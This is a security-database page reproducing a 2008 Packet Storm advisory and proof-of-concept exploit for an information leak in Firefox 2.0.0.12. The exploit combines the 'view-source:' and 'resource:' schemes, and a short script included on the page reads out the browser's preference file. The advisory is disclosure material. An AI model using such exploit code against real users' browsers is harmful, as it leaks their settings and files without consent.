Lucene search
K

firefox20012-poc.txt

🗓️ 11 Feb 2008 00:00:00Reported by Carl HardwickType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Firefox 2.0.0.12 information leak exploit using 'view-source:' schem

Code
`Don't blame the extension developers this time :)  
  
You probably thought otherwise after they just released version  
2.0.0.12. a couple of hours ago, that had a fix for numerous other  
vulnerabilities. But guess what? we are going to see 2.0.0.13 pretty  
soon I guess. I snared at Mozilla before: don't patch vulnerabilities  
for fifty percent, take the time and fix the cause. Because directory  
traversal through plugins is all nice and such, we don't need it. We  
can trick Firefox itself in traversing directories back. I found  
another information leak that is very serious because we are able to  
read out all preferences set in Firefox, or just open or include about  
every file stored in the Mozilla program files directory, and this  
without any mandatory settings or plugins.  
  
In the vulnerability we make use of the 'view-source:' scheme that  
allows us to source out the 'resource:' scheme. With it, we can view  
the source of any file located in the 'resource:///' directory, which  
translates back to: file:///C:/Program Files/Mozilla Firefox/. Then we  
only include the file inside it and it becomes available to a new  
page's DOM, and so we are able to read all settings.  
  
Other issues can emerge also, this is only a short-hand proof of  
concept. Like always, more is possible. While chatting with Gareth  
Heyes, I came up with the vector in a couple of minutes. We talked  
about more issues which we probably are going to discuss very soon.  
  
<script>  
  
/*  
@name: Firefox <= 2.0.0.12 information leak pOc  
@date: Feb. 07 2008  
@author: Ronald van den Heetkamp  
@url: http://www.0x000000.com  
*/  
  
pref = function(a,b) {  
  
document.write( a + ' -> ' + b + '<br />');  
  
};  
  
</script>  
  
<script src="view-source:resource:///greprefs/all.js"></script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
28